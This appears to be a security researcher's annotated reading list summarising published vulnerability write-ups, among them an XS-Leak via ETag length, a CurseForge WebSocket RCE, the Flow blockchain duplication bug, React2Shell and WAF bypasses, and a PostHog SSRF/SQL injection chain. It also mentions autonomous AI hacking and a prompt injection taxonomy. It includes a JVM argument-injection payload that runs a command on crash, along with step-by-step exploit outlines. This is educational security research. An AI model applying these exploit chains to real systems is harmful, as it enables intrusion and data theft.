Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cross-Site ETag Length Leak- 1855

Takeshi Kaneko (arkark)    Reference →Posted 2 Months Ago
  • The author of this post found an unintended way to solve a CTF challenge by exploiting a new cross-site leak (XSLeaks) technique. So, they made this into a standalone challenge for this CTF. The challenge had a single solve.
  • The setup is a note-taking app where GET / returns the notes, with a search parameter in query, and a note can be created via POST /new, which is vulnerable to CSRF. One of the notes on the bot contains the flag, and it's your job to steal it from another JavaScript tab. The timeout is 60s but there's no HTML injection, no sorting, no CSS and no other loaded resources.
  • The ETag header is an HTTP response header that acts as a unique identifier for a specific version of a web resource. It's useful for caching data more effectively. Mozilla docs. The application sets the tag via jshttp/etag, which formats the content size in hex as a prefix. The ETag length can differ by 1 depending on the response size and is controlled because of the CSRF bug.
  • This is the beginning of the primitive. What can you do with this? If a response includes the ETag header, subsequent requests will use the same URL with the If-None-Match header containing the ETag. Many web servers have a maximum size for request headers and will output a 431 Request Header Fields Too Large error if exceeded.
  • By padding the URL so that the overall header size is right at the threshold, the extra If-None-Match byte can be the difference between a 200 Ok and a 431. Using the search, this can be abused to check whether the searched bytes match or not, cross-origin. But, can you see this? Cross-origin status codes are opaque!
  • Chrome has a behaviour where the browser may or may not push an entry to the page history. If the same URL is accessed twice in a row but the second navigation fails, only one history event is added. If they both succeed, then two events are added. By looking at the number of entries in the page history, we can determine whether the navigation succeeded or failed.
  • Putting this altogether, the exploit has a few steps:
    1. Use the CSRF creation of notes to fine-tune the number of bytes on a page to be on the boundary.
    2. URL pad the SECOND request near the Node's header-size threshold.
    3. Measure the history.length of the frame to see whether the second navigation occurred or not.
    4. Repeat character by character until the flag is leaked.
  • In the unintended solution of another challenge, they used the presence of an ETag header to cause the same issue.
  • Overall, a great post on a new XS-Leaks technique! These are always really complicated and really subtle, so I appreciated the new write-up for it.

When WebSockets Lead to RCE in CurseForge - 1854

Elliott.diy    Reference →Posted 2 Months Ago
  • The author of this post had recently found an RCE in a VPN client called SuperShy. After finding this bug, they were curious about other services that exposed WebSockets locally on their system. They noticed that CurseForge was doing this, a widely used video game modding platform.
  • To actually find the websocket, they used something like Wireshark to see what was going on. Every time CurseForge was launched, they would see a payload for a typical launch message. Notably, it had AdditionalJavaArguments inside of it, a type and a Name that looked like Java functions.
  • Websockets are not bound to the Same Origin Policy (SOP) as HTTP requests are. As long as the server allows requests from any origin, it's allowed. The message contained no origin check, no authorization mechanism, or anything else. So, they tried connecting from a Websocket with a bogus origin header, and it worked. This means the application can be accessed from any website the user visits. Neat!
  • There were several actions but a single one stood out: minecraftTaskLaunchInstance. It contains a parameter for arbitrary additional Java arguments that is used to start the game. Another interesting one is createModpack. This is creating a modpack on the user's system. This is required because we need a valid modpack to call minecraftTaskLaunchInstance with.
  • The author used a clever trick to trigger arbitrary code. First, they pass -XX:MaxMetaspaceSize=16m; this limits the JVM's memory space. Since the JVM crashes, it will call an out-of-memory handler, which can be anything. The second flag is -XX:OnOutOfMemoryError="cmd.exe /c calc", that gets triggered on crash.
  • The CurseAgent doesn't bind its WebSocket server to a fixed port. It listens to a randomly assigned local port whenever the launcher starts. So they wrote a JavaScript scanner that scans 16K ports to find this.
  • Good write-up! To fix the bug, CurseForge no longer exposes the WebSocket server; I don't know what they use for this functionality instead.

Flow Security Incident 27th December: Technical Post-Mortem- 1853

Flow    Reference →Posted 2 Months Ago
  • Flow suffered a major hack of about $3.9M USD. This was not an application but an issue with the blockchain itself. No existing user balances were accessed; the attacker was able to duplicate assets out of thin air. This is the story of vulnerability and how Flow handled it.
  • Cadence is a resource-oriented programming language similar to Move. In many blockchains, such as EVM, tokens are in a ledger (a map of balances), and that's it. In Flow, they are programmable objects that exist in a user's account storage, mimicking a physical dollar. These Resources, mimicking a physical asset, cannot be copied or accidentally discarded; they can only be moved or explicitly destroyed. The resources are great, but rigorous static and dynamic checks are performed to ensure resource integrity. If this could be bypassed, it would be a major problem.
  • In Cadence, Attachments are designed to allow developers to extend a struct or resource type with new functionality. they are values that are just attached to existing resources. When making a transaction, the imported struct and the value types were passed in dynamically. The validation for attachment types was not strict enough, which is the main reason for the issue. Mainly, the fields passed in were not checked against their static declared types, AND the runtime types field information could be specified incorrectly.
  • So, what's the consequence of this? By specifying an attachment with invalid fields, Cadence would believe that a type is a struct when it was actually a Resource during execution. During execution, this allowed the resource to be duplicated repeatedly. By duplicating coins, you could create tokens out of thin air. The verification system, like this, is scary because the consequences of a mistake are so deadly.
  • The authors considered this occurrence and did not perform these checks on some internal types because they should only be creatable by the runtime itself. A small number of these internal types, such as PublicKey used in the exploit, can be created with user code. So, the attacker declared a value as a PublicKey and then encoded a resource-containing structure as a value in its place. This allowed for smuggling a resource inside a struct context.
  • The previous two bugs were nice for copying values. But the resource is a public key type. So, a type-confusion bug was needed to restore the object as a useful resource. On the contract initialization function add(), the static types being used on the call were not validated to match the contract itself. This allowed turning a static public key into a resource. An absolutely crazy chain of three bugs!
  • The vulnerabilities above were fixed with specific checks. They upped the rewards on the bug bounty program and added a regression test for this exploit. To prevent this from happening in the future, several other things were done:
    • Hardened Argument Validation: Prevent rogue fields from being passed in.
    • Extended defensive checks for built-in types: Member access checks are done on all types now. This would have prevented the exploit in the first place.
    • Strict Deployment Semantics: Match between static and dynamic types on the order of contract instantiation.
  • The attacker obtained a small number of each of the 13 tokens. Then, duplicated these small amounts in a sequence 42 times to get much more than the total supply of tokens. The attacker tries to cash out on a centralized exchange but is flagged/stopped due to the massive size. A small number of assets are bridged through Celer, deBridge, and Stargate.
  • So, now what? Are assets gone? Four hours after the exploit took place, the bug was fixed, and validators halted transaction ingestion. Two days later, the counterfeit assets are recovered, destroyed, and the malicious accounts are restricted. Although a lot of tokens were duplicated, the realized damage was about $3.9M via bridged assets prior to the chain halt.
  • How were the tokens recovered? Via a special contract that had Governance authority to delete counterfeit tokens. Funds that were stolen via DEX's were recovered from the attacker-controlled addresses and designated as liquidity pool rebalancing funds.
  • An absolutely crazy exploit and an interesting resource. It's wild to me that Flow could delete resources or change ownership via Governance. Still, it seems like most of the impact was limited by this response so I can respect it.

Our $1 million hacker challenge for React2Shell- 1852

Vercel    Reference →Posted 2 Months Ago
  • When React2Shell happened, the Vercel WAF needed to block all of these exploits. To incentivize the discovery of these, they offered a $50K bounty for each unique bypass technique. This led to 156 reports and $1M being given out. This article is the learnings from that.
  • Seawall is the internal request inspection layer of Vercel's WAF. The goal is to block malicious patterns before it reaches the application. Whenever they got a new way to bypass the WAF from a researcher they A) reproduced, B) created a test case and C) added a new rule. Most reports came within 24 hours but some came in the second 24. After that, lots of very sophisticated techniques were used.
  • At the compute layer (I presume for hosted React applications by Vercel), they wanted to add a mitigation. Since the exploit relies on accessing constructor directly, the runtime denies access to this during React rendering. This broke the exploit path. Even with a WAF bypass, this runtime check would remove all exploitation.
  • The article doesn't discuss every single bypass. It does go through two bypasses that come from the authors of the React2Shell exploit though. The first bypass that is discussed is around Unicode parsing. Many bypasses try to confuse the parser by replacing regular characters with the Unicode representation in JSON. By normalizing the JSON, this isn't a problem anymore. However, if you Uncode encode the Unicode multiple times, this protection no longer works. Now, the WAF will decode recursively over and over again.
  • Most of the exploits were around the prevention of :constructor with a colon. By finding another gadget for property access that used property access and string interpolation, it was possible to use constructor instead. This shows the power of slight deviations in the original exploit.
  • Why did they do this? To test their infrastructure against real attacks. This could not have been simulated. The bypasses to the WAF are now permanent additions to the Firewall product, making it useful for the future. Overall, a great blog post and a great campaign by Vercel.

React2Shell- 1851

raunchg    Reference →Posted 2 Months Ago
  • The React Flight protocol is used to encode inputs/outputs for React Server Functions and Server Components (RSC). This is a Backend For Frontend, similar to GraphQL. When requirements for complex UIs are made quickly, Flight enables data to be transmitted back and forth. By using streaming like this, the UI can render as soon as it receives requests from the backend with promises.
  • In the Flight protocol, data is sent in Chunks. These chunks are labeled as integers for the keys of a JavaScript object, and the values are streamable data sent. Using $@0 allows for data to be streamed later on an as-needed basis, which is a promise. The twitter post linked is great but the wiz article has a little bit of an easier payload to follow.
  • The Flight protocol is only intended to transport user objects. By setting the status to be resolved_model, an attacker can express the internal state of the application for React.
  • In JavaScript, anything that has the function .then() is considered a Promise. Adding then to the internal object treats it as a promise and executes the provided then function. This gets executed as a promise because of the previously used $@0. So, chunk 1 triggers the resolution process for the promise in chunk 0, which causes the vulnerability. The then contains $1:then.
  • The vulnerable code that we're trying to trigger is this: response._formData.get(response._prefix + obj). By overwriting the get function of the response objects with another function and controlling the prefix, we can make an arbitrary function call within the context of React. By using the constructor() as the get and JavaScript code as the parameter, we get arbitrary execution.
  • The reason for the specific payload is to trigger deserialization. This deserialization occurs because of the type of object inserted into the flow. It's crazy to me that it's possible to overwrite a field on an object that will eventually execute a function in JavaScript. This is why the payload is recursive: to make this possible. They needed the internal reference to a chunk object in order to be able to access the prototype information. This is described here.
  • Overall, an absolutely crazy exploit that took hours to craft I'm sure. RCE in a large percentage of websites is a huge deal. Great find!

CVE-2025-54322 (ZERODAY) - Unauthenticated Root RCE affecting ~70,000+ Hosts- 1850

pwn.ai    Reference →Posted 2 Months Ago
  • Xspeeder is a networking vendor that makes routers, SD-WAN appliances, and more. Their core firmware, SXZOS, powers a line of SD-WAN devices that are especially prevalent across remote industrial and branch environments.
  • The company that made this post is pwn.ai - autonomous hacking. The AI starts with nothing but a target and figures it out. From device emulation via VirtualBox to attack surface identification to finding and exploiting an RCE bug.
  • They published the logs of what the AI was doing/doing, which is really interesting. The installation of the ISO and usage in qemu is pretty straightforward. After that, it performs file system reconnaissance to locate a Django service.
  • In the Django service, the bot finds the pre-auth attack surface. This is its target. Within the unauthenticated GateKeeper, some code finds that uses a vulnerable sink; this was found through a simple grep for known bad things in Python, such as eval() and os.system().
  • At the end, it needs to create the request. The data is base64 encoded so they must prepare this. Additionally, since the real purpose of this is to convert a string to a dictionary, the fields in the payload must be strings. There are a few headers that must be set but this wasn't a problem for the bot.
  • This vulnerability is absolutely a low-hanging fruit. But, it was able to setup the IoT device and find the vulnerability all by itself. If computers can run all day, there's no stopping these bots from finding all of the bugs like this. Good find!

How init and init_if_needed work under the hood and the associated token account griefing attack- 1849

jesjupyter    Reference →Posted 2 Months Ago
  • In Anchor, the main framework for developing Solana programs, there are two identifiers for creating accounts: init and init_if_needed. init requires for account creation to occur otherwise it exists. init_if_needed will always run but will create the account if it doesn't already exist.
  • So, is there anything an attacker can open where init is required? Associated Token Accounts (ATAs) are 100% permissionless to create. So, using init with ATAs is a bad idea.

From Zero to Shell: Hunting Critical Vulnerabilities in AVideo - 1848

Valentin Lobstein    Reference →Posted 2 Months Ago
  • AVideo is an open-source audio/video platform to create video-sharing websites, similar to YouTube, written in PHP. The information within an encrypted payload is assumed to be secure. For this reason, the project included a callback() parameter in the encrypted payload that triggered an eval(). So, if you could somehow get valid data to be decrypted, you'd get an RCE.
  • The encryption uses AES-256-CBC under the hood, where the key is a value known as the salt. Despite a change several years ago to fix this, legacy salt generation was kept around via the uniqid() command, which simply returns the machine's microseconds since installation. This timestamp can be leaked by inspecting the default categories in the setup.
  • Still, online brute forcing of the microseconds of the salt sucks. So, they decided to find an offline version. Each video exposes a hashId that is computed via md5(salt). Since all the information is public except the salt, we can compute hashes with different salts until we find the matching one. This allows us to leak salt.
  • The encrypt_decrypt() function uses the system root path as the IV. Either via educated guesses or using the the leaked posterPortraitPath from another API, this can be figured out. With the salt known and the RCE path identified, we can execute RCE on the machine. Pretty neat!
  • Besides this, they found that file uploads and deletions could be performed without authentication, and that an open redirect resulted from a lack of domain validation. Additionally, there were several IDORs from simple missing ownership checks.
  • The vendor said all issues had been patched. However, the critical RCE issue and everything surrounding it were not. Notably, the salt could still be leaked, and the eval() callback remained.
  • At the end of the article, they have a few good takeaways. First, if fallback mechanisms are available, they can still be exploited. Second, the more information you provide to an attacker, the more likely they are to have all of the pieces to the puzzle for exploitation. Finally, always check the patches for vulnerabilities; they are often not done properly. Great bugs!

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain (ZDI-25-099, ZDI-25-097, ZDI-25-096)- 1847

Mehmet Ince    Reference →Posted 2 Months Ago
  • The author of this post has a strict policy on when they will use a product or not for a strict 24-hour research window. This is a hands-on source code review to see how the product would behave in their environment. This is why they were looking into this product in the first place.
  • The architecture has a UI that makes calls to a backend Django server. The server will trigger Celery tasks that get executed on ClicHouse for SQL. There is a PostgresDB for storing status information about the Celery task as well. PostHog supports thousands of external integrations used for CRMs, support, billing systems, and other purposes.
  • The promise is to analyze product/customer data, wherever it is generated. To an attacker, this sounds like a SSRF vulnerability waiting to happen. They found a bypass for CVE-2023-46746 by directly calling a PATCH request to store the endpoint used for a webhook. There's also a TOCTOU bug in the verification. Now, we can set the domain to be localhost.
  • SSRF is excellent, but each one of them has unique exploitation constraints. The vulnerability creates an incoming POST request. Using a 302 redirect, it's possible to change the request method to GET. This is a reasonably powerful SSRF as a result.
  • The ClickHouse database runs on port 8123 via HTTP; this is enabled by default on localhost. GET requests operate as READ ONLY calls and POST for data modifications. This gives us a primitive for executing SQL queries against the underlying Clickhouse datastore. Using the SSRF, it's possible to extract large amounts of data.
  • ClickHouse has a ffeature called Table Functions; these are temporary and query scoped tables that only exist during the duration of the query. While reviewing the escaping functionality of preventing SQL injection, they noticed a Postgres-specific flaw: backslashes don't escape. The code would turn 'posthog_table' into 'posthog_table\'', but the backslash is a literal here. So, we now have SQL injection on the incoming query that can be used to write on a GET request as well.
  • The exploit payload is pretty slick after the SQL injection. First, the internal query must be completed by adding ;END, which makes it read-only. Next, execute a command using cmd_exec and put the results into a payload. An important trick is to use $$ instead of single quotes within the payload. Otherwise, the single quotes would have been escaped once again.
  • This appears to require permissions on PostHog. It'd be weird to be able to add arbitrary webhooks as an anonymous user. Still, the flow control bypass to get the SSRF and the SQL injection within the ClickHouse endpoint were both great finds!

The Arcanum Prompt Injection Taxonomy v1.5- 1846

Jason Haddix    Reference →Posted 2 Months Ago
  • This is a list of AI hacking techniques. Some of these are prompt injection methods, while others are ways to trick the system. They are broken down into four categories: intents, techniques, evasions, and attacker-controlled inputs.